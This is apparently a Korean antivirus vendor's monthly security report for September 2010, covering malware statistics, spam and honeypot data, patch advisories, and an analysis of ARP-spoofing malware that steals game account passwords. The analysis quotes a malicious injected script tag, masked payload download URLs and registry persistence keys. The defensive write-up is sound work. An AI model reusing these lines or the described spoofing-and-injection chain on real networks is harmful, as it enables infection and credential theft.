목차 Part Ⅰ. 9 월의악성코드통계 1. 악성코드통계... 2 (1) 감염악성코드 Top 15... 2 (2) 카테고리별악성코드유형... 3 (3) 카테고리별악성코드비율전월비교... 3 (4) 월별피해신고추이... 4 (5) 월별악성코드 DB 등록추이... 4 2. 악성코드이슈분석 온라인계정비밀번호를훔치는 ARP 스푸핑악성코드... 5 3. 허니팟 / 트래픽분석... 9 (1) 상위 Top 10 포트... 9 (2) 상위 Top 5 포트월별추이... 9 (3) 악성트래픽유입추이...10 4. 스팸메일분석...11 (1) 일별스팸및바이러스통계현황...11 (2) 월별통계현황...11 (3) 스팸메일내의악성코드현황...12 Part Ⅱ. 9 월의보안이슈돋보기 1. 9 월의보안이슈...13 2. 9 월의취약점이슈...15 페이지 1
Part Ⅰ 9월의악성코드통계 1. 악성코드통계 (1) 감염악성코드 Top 15 순위악성코드진단명카테고리 [2010 년 9 월 1 일 ~ 2010 년 9 월 30 일 ] 합계 ( 감염자수 ) 1 2 V.ADV.Admoke Adware 55,195 2 1 S.SPY.Lineag-GLG Spyware 46,529 3 7 V.DWN.el.39xxxx Trojan 33,490 4 2 V.TRJ.Patched.imm Trojan 27,240 5 1 A.ADV.BHO.IESearch Adware 26,463 6 2 S.SPY.OnlineGames.kb Spyware 21,642 7 4 V.WOM.Conficker Worm 21,728 8 New Trojan.Generic.4667513 Trojan 20,078 9 New S.SPY.OnlineGames-H Spyware 19,099 10 New Trojan.Generic.4758434 Trojan 14,837 11 6 V.DWN.Agent.Pinsearch Trojan 14,729 12 New Adware.Generic.139910 Adware 13,050 13 New Backdoor.Generic.456135 Backdoor 11,707 14 5 Trojan.Generic.4567643 Trojan 8,132 15 New Trojan.Generic.4755171 Trojan 8,086 KT 쿡인터넷닥터와 XPEED 알약프리미엄사용자의감염통계를합산에서산출한순위임 감염악성코드 Top 15는사용자 PC에서탐지된악성코드를기반으로산출한통계이다. 9월의감염악성코드 TOP 15는 V.ADV.Admoke이 55,195건으로 TOP 15 중 1위를차지하였으며, S.SPY.Lineag-GLG가 46,529건으로 2위, V.DWN.el.39xxxx가 33,490건으로 3위를차지하였다. 이외에도 9월에새로 Top 15에진입한악성코드는 6종이다. 최근악성코드중에는 MS 인터넷익스플로러취약점 (MS10-002, MS10-018) 을이용해 PC에침투하고, ARP Spoofing 공격과온라인게임계정을탈취하는악성코드의감염이급증하고있어 PC 사용자들의주의가필요하다. 페이지 2
(2) 카테고리별악성코드유형 웜 (Worm) 6% 애드웨어 (Adware) 28% 백도어 (Backdoor) 3% 트로이목마 (Trojan) 37% 스파이웨어 (Spyware) 26% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 하이재커 (Hijacker) 웜 (Worm) 취약점 (Exploit) 바이러스 (Virus) 백도어 (Backdoor) 악성코드유형별비율은트로이목마 (Trojan) 가 37% 로가장많은비율을차지하고, 애드웨어 (Adware) 가 28%, 스파이웨어 (Spyware) 가 26% 의비율을각각차지하고있다. 이번에 37% 의가장높은비율을차지한트로이목마 (Trojan) 는보안이취약한웹사이트에서유포된경우가많이발견되었다. (3) 카테고리별악성코드비율전월비교 하이재커 (Hijacker) 트로이목마 (Trojan) 취약점 (Exploit) 웜 (Worm) 애드웨어 (Adware) 스파이웨어 (Spyware) 백도어 (Backdoor) 0.00% 0.00% 0.00% 0.00% 4.45% 6.35% 0.00% 3.42% 13.78% 27.69% 15.29% 25.52% 66.48% 37.01% 8 월 9 월 바이러스 (Virus) 0.00% 0.00% 0% 20% 40% 60% 80% 100% 카테고리별악성코드비율을전월과비교하면, 트로이목마 (Trojan) 의경우전달에비해 29.47% 정도비율로감소하였고, 스파이웨어의경우 (Spyware) 10.23% 정도증가하였다. ( 바이러스, 취약점등의경우 Top15를기준으로했을때차지하는비율이없다는것이다.) 페이지 3
(4) 월별피해신고추이 [2009 년 10 월 ~ 2010 년 9 월 ] 10 월 11 월 12 월 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 알약사용자의신고를합산에서산출한결과임 월별피해신고추이는알약사용자의신고를합산해서산출한결과로써, 월별신고건수를나타내는그래프이다. 9월의경우전달 (8월) 보다신고건수가감소하였다. (5) 월별악성코드 DB 등록추이 [2009 년 10 월 ~ 2010 년 9 월 ] 200910 200911 200912 201001 201002 201003 201004 201005 201006 201007 201008 201009 Adware Spyware Hijacker KeyLogger Exploit RAT Trojan Worm Backdoor Downloader Dropper Misc 9월은백도어 (Backdoor) 계열의변종파일이가장많이등록되었으며, 다음으로웜 (Worm) 이 많이등록되었다. 그중에서도임의의포트 (Port) 를오픈 (Open) 하여공격자의접속을대기하는 V.BKD.PcClient.vx이가장많이등록되었다. 페이지 4
Part Ⅰ 9 월의악성코드통계 2. 악성코드이슈분석 온라인계정비밀번호를훔치는 ARP 스푸핑악성코드 최근 ARP Spoofing과 MS 취약점을이용해온라인계정과관련된비밀번호를훔치는악성코드가발견되었다. 이악성코드의특징은감염된호스트와동일네트워크에있으면인터넷만해도감염된다는것이다. 어떻게이런일이가능한지분석해보도록한다. 1) 전체흐름악성코드전파의시작은 yahoo.js 파일이다. 이파일은 ad.htm, news.html, count.html 에접속하는스크립트파일이다. 접속하는페이지는최근 MS 취약점을사용하여 s.exe를다운받아서실행하는일을한다. s.exe는두개의파일을다운받고실행한다. 2) S.exe S.exe는드롭퍼 (dropper) 다. 파일내부에있는리소스영역에서 DLL 파일을 Drop하여아래경로에생성한다. %USERPROFILE%\Microsoft\smx4pnp.dll 그리고부팅시자동으로실행되기위해레지스트리를등록한다. SOFTWARE\Microsoft\Windows\CurrentVersion\Run smx4pnp;rundll32.exe "%USERPROFILE%\Microsoft\smx4pnp.dll", Launch 페이지 5
마지막으로 rundll32.exe를이용하여 DLL을실행하고자기자신 (s.exe) 을삭제한다. 대부분의악성코드는자기자신을삭제하는데.bat 파일을만들어서실행하지만이번악성코드의경우는 RTL(Return To Library) 이라는기술을사용했다. 이기술은 2000년대초반시스템해킹에서여러개의함수를순차적으로실행하기위한기법으로많이사용되었다. 그코드는아래와같다. 아무프로세스 ( 여기선 calc.exe) 를 SUSPENDED 상태로생성하고 EIP와 ESP를설정하고스레드를실행한다. EIP를 WaitForSingleObject() 함수로설정했기때문에이함수가먼저실행되고만들어진스택에의해서 DeleteFileW 함수, 마지막으로 ExitProcess 함수가인자값과함께실행된다. 3) smx4pnp.dll smx4pnp.dll는다운로더 (downloader) 다. 아래사이트에서악성파일의경로가적혀있는파일을다운받는다. http://k***i.i*:8*/s.txt 위파일에는악성파일이있는인터넷경로가적혀있고이것을다운받아실행한다. 136 http://98.126.**.***:8*/ma.exe http://98.126.**.***:8*/tt.exe smx4pnp.dll는악성코드를다운받아서실행하는일만한다. 4) ma.exe ma.exe는드롭퍼 (dropper) 이며 %SYSTEM% 에 xcvaver0.dll파일을생성한다. 그리고레지스트리에 CLSID를등록하고 ma.exe 파일을실행한경로와 xcvaver0.dll 파일을생성한경로에대한정보를써놓는다. 페이지 6
HCR\CLSID\{C3D16072-B843-2E1B-450B-50EADDC8EB63} VcmnDllModuleName;C:\WINDOWS\system32\xcvaver0.dll VcmnExeModuleName; C:\Documents and Settings\Administrator\ 바탕화면 \ma.exe VcmnSobjEventName;BNMJJHYUIOPTREMN_0 그리고생성한 xcvaver0.dll을로드하고 Vout() 함수를실행한다. 마지막으로 explorer.exe 프로세스에생성한 xcvaver0.dll 파일을인젝션 (infection) 하여 DLL이해당프로세스에서실행되도록한다. 5) xcvaver0.dll xcvaver0.dll은스파이웨어 (spyware) 다. 아이온, 던전앤파이터, 메이플스토리의계정정보를탈취한다. 다음사이트에서특정단어를검사해서계정을정보를얻는다. 사이트명 찾는단어 plaync.co.kr aion.plaync.jp df.nexon.com maplestory.nexon.com id pwd account password 6) tt.exe tt.exe는드롭퍼 (dropper) 다. 가장핵심이되는일인 ARP Spoofing을하는 nvsvc.exe 파일과이파일을실행하는데필요한 wpcap 관련라이브러리를드롭한다. 생성하는위치와파일목록은다음과같다. %SYSTEM%\nvsvc.exe : ARP Spoofing 하는악성파일 %SYSTEM%\Packet.dll : wpcap 관련라이브러리 %SYSTEM%\WanPacket.dll : wpcap 관련라이브러리 %SYSTEM%\wpcap.dll : wpcap 관련라이브러리 레지스트리 Run 에등록하고자기자신을삭제한다. HCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nvsvc;%system%\nvsvc.exe 7) nvsvc.exe nvsvc.exe은 ARP Spoofing을사용하여외부로부터오는 http 패킷에악성스크립트를삽입하는일을한다. 페이지 7
호스트 PC의 IP 주소를얻어온다. 그리고 c클래스 (xxx.xxx.xxx.1~224) 를순차적으로 ARP Spoofing 공격을하여 ARP cache를감염시킨다. 그리고아래와같이필터를설정하여패킷을받을수있도록한다. ether dst [MAC Address] and not dst [IP Address] ARP cache가감염된 host에서 http request를보내고 response를받을때패킷을변조한다. 헤더바로아래에다음의코드를삽입하여사이트에볼때마다삽입된코드를실행하도록한다. <script src=http://www.fxxxxx.com/js/yahoo.js></script> 이파일은처음에알아본파일이다. 결국악성스크립트가실행되어해당컴퓨터에악성코드가설치되게된다. 그래서단한대의컴퓨터만악성코드에감염되어있어도네트워크상의모든컴퓨터를감염시킬수있다. 이악성코드는 ARP Spoofing과최근 MS 취약점을이용하여전파된다. 네트워크상에감염된호스트가한대만있어도모두감염되는특징이있다. 하지만 MS 업데이트만잘하면이러한감염을막을수있기때문에업데이트알람이뜨면바로설치하는것이좋다. 페이지 8
Part Ⅰ 9월의악성코드통계 3. 허니팟 / 트래픽분석 (1) 상위 Top 10 포트 TCP 3306 5% TCP 1433 4% TCP 21 13% TCP 135 73% 135 21 3306 1433 25 3389 80 23 4899 110 8월에도지속적으로윈도우자체의취약점을대상으로한 TCP 135 포트침입시도가가장많았다. 지난달에비해서는 14% 감소하였지만 TCP 21번에대한침입시도가전달에비해 4 배이상증가하였다. TCP 135 포트에대한침입시도는 RPC(Remote Procedure Call) 버퍼오버런이가능한보안취약점을주로이용한다. (2) 상위 Top 5 포트월별추이 [2010 년 7 월 ~ 2010 년 9 월 ] 135 21 1433 25 3306 2010-07 2010-08 2010-09 알려진취약점을노리는패킷은약간감소했지만 FTP나스팸릴레이를위한서버의권한획득시도가증가했다. 계절적원인과더불어 PC사용이더욱증가하는때가되었으므로, 관리자는쉬운패스워드, 프로그램의취약점등기존에알려진모든보안위협에대해한번더점검해야겠다. 페이지 9
(3) 악성트래픽유입추이 [2009 년 4 월 ~ 2010 년 9 월 ] 2010-04 2010-05 2010-06 2010-07 2010-08 2010-09 전체적인악성트래픽의유입양은전달과비슷하였다. 최근이란의핵시설과같은교통, 발전, 공장자동화같은 SCADA 시스템을노리는 Stuxnet 악성코드가등장하면서다이하드 4.0 같은영화에서나나올법한해커가마음대로교통망을통제하거나, 발전소와같은기간산업을노리는일이실제적인위협으로등장하게되었다. 따라서나자신과국가사이버안보를위해지금사용하는 PC는물론일상생활에서더욱보안에신경써야할것이다. 페이지 10
Part Ⅰ 9월의악성코드통계 3. 스팸메일분석 (1) 일별스팸및바이러스통계현황 40,000 35,000 30,000 25,000 20,000 15,000 10,000 5,000 0 바이러스스팸 2010-09-01 2010-09-03 2010-09-05 2010-09-07 2010-09-09 2010-09-11 2010-09-13 2010-09-15 2010-09-17 2010-09-19 2010-09-21 2010-09-23 2010-09-25 2010-09-27 2010-09-29 일별스팸및바이러스통계현황그래프는하루에수신된악성코드첨부, 스팸메일의개수를나타낸그래프이다. 9월의스팸및바이러스메일의특이사항은페이스북이용자를노린악성코드감염으로의심되는현상이많이발견되었다. 페이스북이용자들간에의미없는메일이쇄도하는사례가속속발견되었으며, 메일에는별다른내용이없는상태로제목이 `Hello` `Hi` `Cool` 등다양하였다. 첨부파일이없어도간단한코드의자동실행만으로도감염되는악성코드도많기때문에받는즉시삭제하는편이안전하다. (2) 월별통계현황 [2010 년 4 월 ~ 2010 년 9 월 ] 2,500,000 1.5% 2,000,000 1.5% 1,500,000 1,000,000 98.4 2.5% 2.6% 98.5 2.6% 2.3% 바이러스 스팸 500,000 97.4 97.3 97.3 97.6 0 4 월 5 월 6 월 7 월 8 월 9 월 페이지 11
월별통계현황은악성코드첨부및스팸메일이전체메일에서차지하는비율을나타내는그래프이다. 9월의스팸메일은 97.6%, 바이러스메일은 2.3% 를차지하였다. 8월에비해스팸메일이 0.3% 증가, 바이러스메일이 0.3% 비율로감소하였다. (3) 스팸메일내의악성코드현황 [2010 년 9 월 1 일 ~ 2010 년 9 월 30 일 ]ff 순위 악성코드진단명 메일수 [ 개 ] 비율 [%] 1 W32/Virut-T 6,902 41.00% 2 W32/MyDoom-H 3,008 17.87% 3 Mal/ZipMal-B 1,774 10.54% 4 JS/WndRed-B 884 5.25% 5 Mal/BredoZp-B 707 4.20% 6 W32/Mytob-C 645 3.83% 7 W32/Sality-I 426 2.53% 8 W32/Bagz-C 419 2.49% 9 W32/Mytob-R 287 1.70% 10 Troj/CryptBx-ZP 271 1.61% 스팸메일내의악성코드현황은 9월바이러스메일에서발견된악성코드중 Top 10을뽑은그래프이다. 현재 W32/Virut-T이 41% 로계속 1위를차지하고있다. 2위는 17.87% 를차지한 W32/MyDoom-H, 3위는 10.54% 를차지한 Mal/ZipMal-B이다. 9월은 SNS(social Network Service) 서비스인페이스북 (Facebook) 에서 `Hello` `Hi` `Cool` 제목으로가짜백신을설치하는악성메일유포가많았다. 페이지 12
Part Ⅱ 9 월의이슈돋보기 1. 9 월의보안이슈 9월에는 Adobe 최신제로데이취약점을이용하는골프클리닉 PDF 악성코드출현과이란원자력발전소에서 SCADA 시스템을목표로한 Stuxnet 악성코드의발견, 온라인계정의비밀번호를훔치는 ARP Spoofing 악성코드의유행에관한보안이슈가있었습니다. 어도비최신제로데이취약점을이용하는골프클리닉 PDF 악성코드주의당신의골프점수를향상시켜줄수있는세계적인강사데이비드레드베터 (David Leadbetter) 의골프클리닉내용으로위장한메일속에어도비아크로뱃 (Adobe Acrobat) 제로데이취약점을이용하는악성 PDF 파일이첨부되어유포한사례를발견했습니다. 취약점 (CVE-2010-2833) 은어도비아크로뱃의 TrueType Font(TTF) 처리과정에서원격코드를실행시킬수있는문제이며 10월 7일에공식보안패치가발표되었습니다. 악성 PDF 파일은새로운다운로더 (Downloader) 악성코드를다운로드한후, 다운받은다운로더는새로운악성코드를내려받기위해대기하는특징을가지고있습니다. < 그림 : 어도비아크로뱃 (Adobe Acrobat) 제로데이취약점 (CVE-2010-2833) 을악용한데이비드레드베터 (David Leadbetter) 골프클리닉악성코드이메일 > 이란핵시설과여러 SCADA 시스템을타켓으로한 Stuxnet 악성코드추석연휴기간동안외신을통해인터넷과연결되지않은 SCADA 시스템을공격하는 Stuxnet 악성코드가이란의원자력발전소에서발견되었다는보도가특히많았습니다. Stuxnet 악성코드는윈도우와 Siemense SCADA 시스템의취약점, USB 자동실행 (Autorun) 을통해유포되며, 알약에서는이미 7월에 Stuxnet의엔진업데이트를완료했습니다. 국내에서도 Stuxnet에감염된 PC가존재한것으로파악되고있으며, 이미감염된 PC에서는알약과 Bitdefender 전용백신을통해 Stuxnet 악성코드를치료하실수있습니다. 알약보안공지 : http://alyac.altools.co.kr/securitycenter/analysis/noticeview.aspx?id=62 페이지 13
<Stuxnet 악성코드가발견된이란부쉐르 (Bushehr) 원자력발전소 > < 지멘스 (Siemens) Simatic WinCC 기반 SCADA 프로그램및 Bitdefender 전용백신 > 온라임계정비밀번호를훔치는 ARP Spoofing 악성코드유행 2007~2008년사이에크게유행했던 ARP Spoofing 공격이다시유행하고있습니다. 10월현재까지도악성코드제작자가지속적인변종을유포하고있는상황입니다. 하지만, 이번에 ARP Spoofing을실행하는악성코드는인터넷익스플로러 (IE) 취약점에대한패치설치와최신버전의백신으로충분히예방할수있습니다. 알약보안공지 : http://alyac.altools.co.kr/securitycenter/analysis/noticeview.aspx?id=58 < 악성코드감염 PC 에서과도한 ARP Reply 패킷이발생하는화면 > <ARP Reply 패킷으로인해잘못된 MAC 주소로변경되는화면및알약전용백신 > 페이지 14
Part Ⅱ 9 월의이슈돋보기 2. 9 월의취약점이슈 Microsoft 9월정기보안업데이트윈도우취약점 ( 프린터스풀러서비스, MPEG-4 코덱, 유니코드스크립트프로세서등 ) 으로원격코드실행문제점과 MS 아웃룩, IIS 서버, Active Directory 취약점으로인한원격코드실행문제점등을해결한 Microsoft 9월정기보안업데이트를발표하였습니다. < 해당제품 > Windows XP, Server 2003~2008 Windows Vista, Windows 7 Microsoft Office XP - Outlook 2002 IIS(Internet Information Server) 5.1~7.5 < 취약점목록 > [MS10-061] 인쇄스풀러서비스의취약점으로인한원격코드실행문제점 [MS10-062] MPEG-4 코덱의취약점으로인한원격코드실행문제점 [MS10-063] Unicode Scripts Processor의취약점으로인한원격코드실행문제점 [MS10-064] Microsoft Outlook의취약점으로인한원격코드실행문제점 [MS10-065] Microsoft IIS( 인터넷정보서비스 ) 의취약점으로인한원격코드실행문제점 [MS10-066] 원격프로시저호출의취약점으로인한원격코드실행문제점 [MS10-067] 워드패드텍스트변환기의취약점으로인한원격코드실행문제점 [MS10-068] 로컬보안기관하위시스템서비스의취약점으로인한권한상승문제점 [MS10-069] Windows CSRSS(Client/Server Runtime Subsystem) 의취약점으로인한권한상승문제점 < 해결책 > Windows Update를수행하거나 Microsoft 보안공지요약사이트에서해당취약점들의개별적인패치파일을다운로드받을수있습니다. 한글 : http://www.microsoft.com/korea/technet/security/bulletin/ms10-sep.mspx 영문 : http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx Adobe Acrobat/Flash 계열제품보안업데이트권고 Adobe Acrobat/Flash 계열의제품군에대한코드실행관련취약점을패치하는보안업데이트가발표되었습니다. 공격자는해당취약점을악용하여영향받는소프트웨어를비정상적으로종료시키거나, 임의의명령을실행하여시스템에대한권한획득할수있습니다. 낮은버전의 Adobe Flash Player/Adobe Air 사용으로악성코드감염등의사고가발생할수있으므로사용자의주의및최신버전설치를권고합니다. 페이지 15
< 해당제품 > - Adobe Acrobat / Reader 9.3.4 이하버전 (Windows, Mac OS, Unix) < 취약점목록 > CVE-2010-2883 : This update resolves a font-parsing input validation vulnerability that could lead to code execution Note: There are reports that this issue is being actively exploited in the wild. CVE-2010-2884 : This update resolves a memory corruption vulnerability in the authplay. dll component that could lead to code execution. CVE-2010-2887 : This update resolves multiple potential Linux-only privilege escalation issues CVE-2010-2888 : This update resolves multiple input validation errors that could lead to code execution (Windows, ActiveX only) CVE-2010-2889 : This update resolves a font-parsing input validation vulnerability that could lead to code execution. CVE-2010-2890 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3619 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3620 : This update resolves an image-parsing input validation vulnerability that could lead to code execution. CVE-2010-3621 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3622 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3623 : This update resolves a memory corruption vulnerability that could lead to code execution (Macintosh platform only) CVE-2010-3624 : This update resolves an image-parsing input validation vulnerability that could lead to code execution (Macintosh platform only) CVE-2010-3625 : This update resolves a prefix protocol handler vulnerability that could lead to code execution CVE-2010-3626 : This update resolves a font-parsing input validation vulnerability that could lead to code execution. CVE-2010-3627 : This update resolves an input validation vulnerability that could lead to code execution. CVE-2010-3628 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3629 : This update resolves an image-parsing input validation vulnerability that could lead to code execution. 페이지 16
CVE-2010-3630 : This update resolves a denial of service vulnerability; arbitrary code execution has not been demonstrated, but may be possible. CVE-2010-3631 : This update resolves an array-indexing vulnerability that could lead to code execution (Macintosh platform only) CVE-2010-3632 : This update resolves a memory corruption vulnerability that could lead to code execution. CVE-2010-3658 : This update resolves a memory corruption vulnerability that could lead to code execution. This update resolves a denial of service issue (CVE-2010-3656). This update resolves a denial of service issue (CVE-2010-3657). < 해결책 > Adobe Flash와 Acrobat 계열제품을 Adobe 홈페이지에서최신으로업데이트하거나개별패치를다운로드하여설치합니다. (Adobe Reader : http://get.adobe.com/kr/reader/) < 참고사이트 > http://www.adobe.com/support/security/bulletins/apsb10-021.html ASP.NET Padding Oracle 취약점에대한보안패치발표이번취약점을악용해웹서버의암호화된데이터나시스템정보를공격자가획득할수있으며, 실제로공격피해가보고되고있습니다. Microsoft에서는 ASP.NET Padding Oracle 취약점에대해 Critical 아래의 Important로규정하고있으나실제공격이발생하고있는점을감안해비정기보안패치를발표하였습니다. 취약점 : CVE-2010-3322, MS10-070 < 해당제품 > Windows XP/Vista/7, Windows 2003~2008 Server,.NET Framework 1.1~4.0 < 취약점설명 > ASP.NET 프레임워크가악의적으로조작된데이터를처리하는과정에서 ViewState필드와같은암호화된데이터나 Web.config와같은설정파일의내용을노출시키는문제점이발견되었습니다. 이에 Microsoft에서는취약점을해결하는비정기보안패치를발표하였으므로 Windows 기반의웹서버에보안패치설치를권고합니다. < 해결책 > Windows Update를수행하거나 Microsoft 보안공지요약사이트에서해당취약점들의파일을다운로드받을수있습니다. (Windows Update는 10월 12일부터시행 ) < 참고사이트 > 영문 : http://www.microsoft.com/technet/security/bulletin/ms10-070.mspx 페이지 17
Contact us 이스트소프트알약보안대응팀 Tel : 02-881-2364 E-mail : help@alyac.co.kr : 알약사이트 : www.alyac.co.kr 페이지 18